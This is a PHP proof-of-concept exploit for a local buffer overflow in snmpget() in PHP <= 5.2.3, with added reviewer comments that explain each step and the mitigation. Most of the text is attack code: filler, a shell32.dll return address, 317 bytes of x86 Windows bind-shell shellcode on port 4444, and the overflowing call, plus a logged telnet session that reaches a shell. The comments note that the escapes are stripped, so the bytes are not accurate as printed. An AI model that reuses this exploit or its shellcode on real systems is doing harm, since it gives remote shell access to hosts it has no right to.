# Title : PHP <= 5.2.3 snmpget() object id Local Buffer Overflow Exploit (EDI)
# Published : 2007-08-09
# Author : Inphex
<?php
/*
Inphex
reference ->http://milw0rm.com/exploits/4204
317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1n
telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:apache>

Reviewer notes (defensive context):
- Proof of concept for a buffer overflow in the object-id argument of
  snmpget() in PHP <= 5.2.3 (per the page title). It is a local issue:
  the script has to run as PHP on the affected host, so the exposure is
  anyone allowed to execute PHP there (shared hosting, untrusted scripts).
- The script is a flat sequence: check that ext/snmp is loaded, build an
  over-long object id (filler + overwritten return address + payload),
  and pass it to snmpget().
- As printed, every "x.." literal below has lost its backslash escape
  characters and is a plain ASCII string (e.g. the $ret literal is twelve
  printable characters, not four bytes); this listing is not byte-accurate.
- Mitigation: a PHP release newer than 5.2.3 (presumably fixed there, per
  the title) or leaving the snmp extension unloaded, which makes this
  script exit immediately at the extension_loaded() check.
*/
# Bail out when the affected code path (ext/snmp) is not available at all.
if (!extension_loaded("snmp")) {
die("snmp extension required!");
}
# 254-byte filler that overruns the fixed-size object-id buffer.
$buffer = str_repeat("A",254);
# Value that lands on the saved return address; per the author's comment it is
# the address of a CALL EDI instruction in shell32.dll on Windows XP.
$ret = "xD7x98x95x7C"; #shell32.dll ->CALL EDI WindowsXP
# Payload placed after the return address; the header above describes it as a
# 317-byte x86 Windows bind shell (presumably listening on TCP 4444, per the
# telnet line in the header).
$shellcode=
"xbdxdbxc6x38x8fxd9xc9xd9x74x24xf4x58x31xc9" .
"xb1x51x83xc0x04x31x68x0ex03xb3xc8xdax7axbf" .
"xbfxf1xc8xd7xb9xf9x2cxd8x5ax8dxbfx02xbfx1a" .
"x7ax76x34x60x80xfex4bx76x01xb1x53x03x49x6d" .
"x65xf8x3fxe6x51x75xbex16xa8x49x58x4ax4fx89" .
"x2fx95x91xc0xddx98xd3x3ex29xa1x87xe4xfaxa0" .
"xc2x6exa5x6ex0cx9ax3cxe5x02x17x4axa6x06xa6" .
"xa7x5bx1bx23xbex37x47x2fxa0x04xb6x94x46x01" .
"xfax1ax0cx55xf1xd1x62x49xa4x6dxc2x79xe8x19" .
"x4dx37x1ax36x01x38xf4xa0xf1xa0x91x1fxc4x44" .
"x15x13x1axcbx8dx2cx8ax9bxe6x3exd7x60xa9x3f" .
"xfexc9xc0x25x99x74x3fxadx64x23xaaxacx97x1b" .
"x42x68x6ex6ex3exddx8ex46x12xb1x23x35xc6x76" .
"x97xfaxbbx87xc7x9ax53x69xb4x04xf7x00xa5x5d" .
"x9fxb6x3cx2dxa7xe0xbfx1bx4dx1fx11xf6x6dxcf" .
"xf9x5cx3cxdex10xcbxc0xc9xb0xa6xc1x26x5exad" .
"x77x41xd6x7ax77x9bxb9xd0xd3x71xc5x08x48x11" .
"xdexd1xa9x9bx77xdexe0x09x87xf0x6bxd8x13x96" .
"x1bx7fxb1xdfx39x15x19x86xe8x26x10xdfx81xf2" .
"xaaxfdx67x3bx5fxabx76xf9x8dx55xc4xd2x5ex24" .
"xb3x12xcax9dxefx0bx7ex1fx5cxddx81xaaxe7x1d" .
"xabx0fxbfxb3x05xfex6ex5exa7x51xc0xcbxf6xae" .
"x32x9bx55x89xb6x92xf5xd6x6fx40x05xd7xa7x6a" .
"x29xacx9fx68x49x76x7bx6ex98x24x7bx40x4dx38" .
"x09x65xd1xebxf1xb0x12xdbx0ex3dxed";
# snmpget(hostname, community, object_id, ...): the first two arguments are
# throwaway ints (coerced to "1"); only the over-long third argument matters.
# The trailing "" concatenations are no-ops.
snmpget (1, 1, $buffer."xebx04".$ret."".$shellcode."");
?>